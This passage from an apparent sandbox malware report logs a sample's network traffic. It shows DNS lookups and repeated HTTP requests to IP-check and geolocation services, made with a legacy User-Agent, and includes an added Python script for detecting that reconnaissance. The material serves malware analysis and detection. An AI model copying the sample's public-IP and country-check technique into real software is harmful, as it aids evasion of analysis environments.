Jan 10, 2025 16:46:57.363349915 CET | 49720 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:57.366272926 CET | 49714 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:57.367508888 CET | 49726 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:57.371320009 CET | 80 | 49714 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:46:57.371382952 CET | 49714 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:57.372371912 CET | 80 | 49726 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:46:57.372445107 CET | 49726 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:57.372534037 CET | 49726 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:57.377280951 CET | 80 | 49726 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:46:58.030265093 CET | 80 | 49726 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:46:58.031609058 CET | 49729 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:58.031641006 CET | 443 | 49729 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:58.031708002 CET | 49729 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:58.031919003 CET | 49729 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:58.031932116 CET | 443 | 49729 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:58.077474117 CET | 49726 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:58.518474102 CET | 443 | 49729 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:58.520600080 CET | 49729 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:58.520617962 CET | 443 | 49729 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:58.651916027 CET | 443 | 49729 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:58.651968956 CET | 443 | 49729 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:58.652017117 CET | 49729 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:58.652508020 CET | 49729 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:58.665640116 CET | 49726 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:58.669459105 CET | 49734 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:58.670641899 CET | 80 | 49726 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:46:58.670717955 CET | 49726 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:58.674428940 CET | 80 | 49734 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:46:58.674515963 CET | 49734 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:58.674727917 CET | 49734 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:58.679532051 CET | 80 | 49734 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:46:59.323669910 CET | 80 | 49734 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:46:59.325273991 CET | 49740 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:59.325330973 CET | 443 | 49740 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:59.325408936 CET | 49740 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:59.325767994 CET | 49740 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:59.325788975 CET | 443 | 49740 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:59.385175943 CET | 49734 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:59.786303043 CET | 443 | 49740 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:59.788407087 CET | 49740 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:59.788436890 CET | 443 | 49740 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:59.948792934 CET | 443 | 49740 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:59.948920012 CET | 443 | 49740 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:46:59.949101925 CET | 49740 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:59.966289043 CET | 49740 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:46:59.978806019 CET | 49734 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:59.983918905 CET | 80 | 49734 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:46:59.983992100 CET | 49734 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:59.987231970 CET | 49746 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:46:59.992110968 CET | 80 | 49746 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:46:59.992197990 CET | 49746 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:47:00.004451990 CET | 49746 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:47:00.009385109 CET | 80 | 49746 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:47:00.660883904 CET | 80 | 49746 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:47:00.662205935 CET | 49752 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:47:00.662242889 CET | 443 | 49752 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:47:00.662312984 CET | 49752 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:47:00.662617922 CET | 49752 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:47:00.662631035 CET | 443 | 49752 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:47:00.702469110 CET | 49746 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:47:01.116662979 CET | 443 | 49752 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:47:01.118474960 CET | 49752 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:47:01.118494987 CET | 443 | 49752 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:47:01.281191111 CET | 443 | 49752 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:47:01.281244040 CET | 443 | 49752 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:47:01.281382084 CET | 49752 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:47:01.281939030 CET | 49752 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:47:01.285228014 CET | 49746 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:47:01.286385059 CET | 49754 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:47:01.290256977 CET | 80 | 49746 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:47:01.291156054 CET | 80 | 49754 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:47:01.291249990 CET | 49746 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:47:01.291290998 CET | 49754 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:47:01.291397095 CET | 49754 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:47:01.296137094 CET | 80 | 49754 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:47:01.953629971 CET | 80 | 49754 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:47:01.955888987 CET | 49759 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:47:01.955977917 CET | 443 | 49759 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:47:01.956114054 CET | 49759 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:47:01.956521988 CET | 49759 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:47:01.956554890 CET | 443 | 49759 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:47:01.999344110 CET | 49754 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:47:02.440366983 CET | 443 | 49759 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:47:02.473367929 CET | 49759 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:47:02.473448992 CET | 443 | 49759 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:47:02.697408915 CET | 443 | 49759 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:47:02.698098898 CET | 443 | 49759 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:47:02.698178053 CET | 49759 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:47:02.698729038 CET | 49759 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:47:02.706990004 CET | 49754 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:47:02.708694935 CET | 49765 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:47:02.712546110 CET | 80 | 49754 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:47:02.712625980 CET | 49754 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:47:02.714396954 CET | 80 | 49765 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:47:02.714515924 CET | 49765 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:47:02.714654922 CET | 49765 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:47:02.719590902 CET | 80 | 49765 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:47:03.354710102 CET | 80 | 49765 | 193.122.6.168 | 192.168.2.6
Jan 10, 2025 16:47:03.356410980 CET | 49771 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:47:03.356432915 CET | 443 | 49771 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:47:03.356785059 CET | 49771 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:47:03.356785059 CET | 49771 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:47:03.356812954 CET | 443 | 49771 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:47:03.405607939 CET | 49765 | 80 | 192.168.2.6 | 193.122.6.168
Jan 10, 2025 16:47:03.858937025 CET | 443 | 49771 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:47:03.860903978 CET | 49771 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:47:03.860918045 CET | 443 | 49771 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:47:03.973804951 CET | 443 | 49771 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:47:03.973879099 CET | 443 | 49771 | 104.21.16.1 | 192.168.2.6
Jan 10, 2025 16:47:03.973949909 CET | 49771 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:47:03.974421978 CET | 49771 | 443 | 192.168.2.6 | 104.21.16.1
Jan 10, 2025 16:47:04.525021076 CET | 49765 | 80 | 192.168.2.6 | 193.122.6.168
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 16:46:53.369896889 CET | 50483 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 16:46:53.376764059 CET | 53 | 50483 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 16:46:54.377360106 CET | 53078 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 16:46:54.385334969 CET | 53 | 53078 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 16:46:53.369896889 CET | 192.168.2.6 | 1.1.1.1 | 0xdfd3 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 10, 2025 16:46:54.377360106 CET | 192.168.2.6 | 1.1.1.1 | 0x57bc | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 16:46:53.376764059 CET | 1.1.1.1 | 192.168.2.6 | 0xdfd3 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 16:46:53.376764059 CET | 1.1.1.1 | 192.168.2.6 | 0xdfd3 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 16:46:53.376764059 CET | 1.1.1.1 | 192.168.2.6 | 0xdfd3 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 16:46:53.376764059 CET | 1.1.1.1 | 192.168.2.6 | 0xdfd3 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 16:46:53.376764059 CET | 1.1.1.1 | 192.168.2.6 | 0xdfd3 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 16:46:53.376764059 CET | 1.1.1.1 | 192.168.2.6 | 0xdfd3 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 16:46:54.385334969 CET | 1.1.1.1 | 192.168.2.6 | 0x57bc | No error (0) | reallyfreegeoip.org | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 16:46:54.385334969 CET | 1.1.1.1 | 192.168.2.6 | 0x57bc | No error (0) | reallyfreegeoip.org | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 16:46:54.385334969 CET | 1.1.1.1 | 192.168.2.6 | 0x57bc | No error (0) | reallyfreegeoip.org | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 16:46:54.385334969 CET | 1.1.1.1 | 192.168.2.6 | 0x57bc | No error (0) | reallyfreegeoip.org | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 16:46:54.385334969 CET | 1.1.1.1 | 192.168.2.6 | 0x57bc | No error (0) | reallyfreegeoip.org | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 16:46:54.385334969 CET | 1.1.1.1 | 192.168.2.6 | 0x57bc | No error (0) | reallyfreegeoip.org | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 16:46:54.385334969 CET | 1.1.1.1 | 192.168.2.6 | 0x57bc | No error (0) | reallyfreegeoip.org | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
                                                                      • reallyfreegeoip.org
                                                                      • checkip.dyndns.org
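The two domains above, together with the HTTP session that follows, are the whole of the sample's "detect the country of the analysis system" step: resolve and query an IP-check service, then resolve a geolocation service and query it over TLS, repeating on a fresh connection every second or so. The following is an added triage example written for this report; it is not Joe Sandbox code and not the malware's own code. Its inputs are constructed from the DNS, HTTP and TCP tables in this report, and the host lists, the 30-second correlation window, the legacy User-Agent heuristic and the tuple-based event format are assumptions of the example, not properties of the sample. It extracts the public IP from the checkip body exactly as a stealer would, flags the IP-check-then-geolocation sequence, and measures the spacing of the new connections to 193.122.6.168:80 so that one-off checks can be told apart from polling.

```python
"""Added example (not part of the Joe Sandbox report): triage helpers for the
IP-check / geolocation reconnaissance pattern shown in this report.

Inputs are constructed from the report's DNS, HTTP and TCP tables. Host lists,
thresholds and the event format are this example's own assumptions."""
import re
import statistics
from dataclasses import dataclass
from datetime import datetime

# Assumption: services the sample used to learn its public IP and its country.
IP_CHECK_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com"}
GEOIP_HOSTS = {"reallyfreegeoip.org"}
# An IE 6/7-era User-Agent sent by a modern host is a strong oddity on its own.
LEGACY_UA = re.compile(r"MSIE [1-7]\.\d")
# Body format returned by checkip.dyndns.org (see the report's HTTP session).
CHECKIP_BODY_RE = re.compile(r"Current IP Address:\s*(\d{1,3}(?:\.\d{1,3}){3})")

# Constructed from the report: DNS queries and the first HTTP request, times in CET.
SAMPLE_EVENTS = [
    ("2025-01-10 16:46:53.369896", "dns", "checkip.dyndns.org", ""),
    ("2025-01-10 16:46:53.446540", "http", "checkip.dyndns.org",
     "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"),
    ("2025-01-10 16:46:54.377360", "dns", "reallyfreegeoip.org", ""),
    ("2025-01-10 16:46:54.385951", "tls", "reallyfreegeoip.org", ""),
]
# The 104-byte response body from the report's HTTP session.
CHECKIP_BODY = ("<html><head><title>Current IP Check</title></head>"
                "<body>Current IP Address: 8.46.123.189</body></html>\r\n")
# First client packet of each new TCP flow to 193.122.6.168:80, from the TCP table.
SAMPLE_FLOW_STARTS = ["16:46:53.441190958", "16:46:56.088980913", "16:46:57.367508888",
                      "16:46:58.669459105", "16:46:59.987231970", "16:47:01.286385059",
                      "16:47:02.708694935"]


@dataclass
class Event:
    ts: datetime
    kind: str        # dns | http | tls
    host: str
    user_agent: str = ""


def extract_public_ip(body: str):
    """Pull the dotted quad out of a checkip.dyndns.org body the way a stealer does;
    returns None if it is absent or not a valid IPv4 address."""
    m = CHECKIP_BODY_RE.search(body)
    if not m:
        return None
    ip = m.group(1)
    return ip if all(0 <= int(o) <= 255 for o in ip.split(".")) else None


def detect_ip_geo_recon(raw_events, window_s: float = 30.0):
    """Flag an IP-check lookup followed within window_s by a geolocation lookup.
    raw_events: (timestamp, kind, host, user_agent) tuples. One finding per host pair."""
    events = sorted(
        (Event(datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f"), kind, host.lower(), ua)
         for ts, kind, host, ua in raw_events),
        key=lambda e: e.ts)
    findings, seen = [], set()
    for i, ev in enumerate(events):
        if ev.host not in IP_CHECK_HOSTS:
            continue
        for later in events[i + 1:]:
            delta = (later.ts - ev.ts).total_seconds()
            if delta > window_s:
                break
            pair = (ev.host, later.host)
            if later.host in GEOIP_HOSTS and pair not in seen:
                seen.add(pair)
                # Did any request to the IP-check host carry a legacy User-Agent?
                legacy = any(LEGACY_UA.search(e.user_agent) for e in events
                             if e.host == ev.host and e.user_agent)
                findings.append({
                    "ip_check_host": ev.host,
                    "geoip_host": later.host,
                    "delta_s": round(delta, 3),
                    "legacy_user_agent": legacy,
                    "trigger": ev.kind,
                    "first_seen": ev.ts.isoformat(sep=" "),
                })
                break
    return findings


def flow_intervals(flow_starts):
    """Seconds between successive new connections to the same server; a tight,
    regular spacing (about 1.3 s in this report) means polling, not a one-off check."""
    # strptime's %f accepts at most six digits, so trim the nanosecond timestamps.
    times = [datetime.strptime(t[:15], "%H:%M:%S.%f") for t in flow_starts]
    return [round((b - a).total_seconds(), 3) for a, b in zip(times, times[1:])]


if __name__ == "__main__":
    print("public IP reported to the sample:", extract_public_ip(CHECKIP_BODY))
    for finding in detect_ip_geo_recon(SAMPLE_EVENTS):
        print("recon sequence:", finding)
    gaps = flow_intervals(SAMPLE_FLOW_STARTS)
    print("poll intervals (s):", gaps, "median:", statistics.median(gaps))
```

The correlation deliberately keys on hosts rather than on the ETPRO signatures in the IDS table, because the second half of the sequence is TLS to reallyfreegeoip.org and only the DNS answer and the SNI identify it; feeding it DNS, HTTP and TLS events from a proxy or Zeek log gives the same result as the constructed input here.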
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49710 | 193.122.6.168 | 80 | 6968 | C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 10, 2025 16:46:53.446540117 CET151OUTGET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                      Connection: Keep-Alive
                                                                       Jan 10, 2025 16:46:54.084300995 CET | 273 | IN | HTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:46:53 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                       Jan 10, 2025 16:46:54.092763901 CET | 127 | OUT | GET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                       Jan 10, 2025 16:46:54.278549910 CET | 273 | IN | HTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:46:54 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                       Jan 10, 2025 16:46:55.198730946 CET | 127 | OUT | GET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                       Jan 10, 2025 16:46:55.384382010 CET | 273 | IN | HTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:46:55 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       1 | 192.168.2.6 | 49714 | 193.122.6.168 | 80 | 6968 | C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       Jan 10, 2025 16:46:56.097676039 CET | 127 | OUT | GET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                       Jan 10, 2025 16:46:56.729125023 CET | 273 | IN | HTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:46:56 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       2 | 192.168.2.6 | 49726 | 193.122.6.168 | 80 | 6968 | C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       Jan 10, 2025 16:46:57.372534037 CET | 127 | OUT | GET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                       Jan 10, 2025 16:46:58.030265093 CET | 273 | IN | HTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:46:57 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       3 | 192.168.2.6 | 49734 | 193.122.6.168 | 80 | 6968 | C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       Jan 10, 2025 16:46:58.674727917 CET | 127 | OUT | GET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                       Jan 10, 2025 16:46:59.323669910 CET | 273 | IN | HTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:46:59 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       4 | 192.168.2.6 | 49746 | 193.122.6.168 | 80 | 6968 | C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       Jan 10, 2025 16:47:00.004451990 CET | 127 | OUT | GET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
                                                                       Jan 10, 2025 16:47:00.660883904 CET | 273 | IN | HTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:47:00 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 104
                                                                      Connection: keep-alive
                                                                      Cache-Control: no-cache
                                                                      Pragma: no-cache
                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                       5 | 192.168.2.6 | 49754 | 193.122.6.168 | 80 | 6968 | C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                       Timestamp | Bytes transferred | Direction | Data
                                                                       Jan 10, 2025 16:47:01.291397095 CET | 127 | OUT | GET / HTTP/1.1
                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                      Host: checkip.dyndns.org
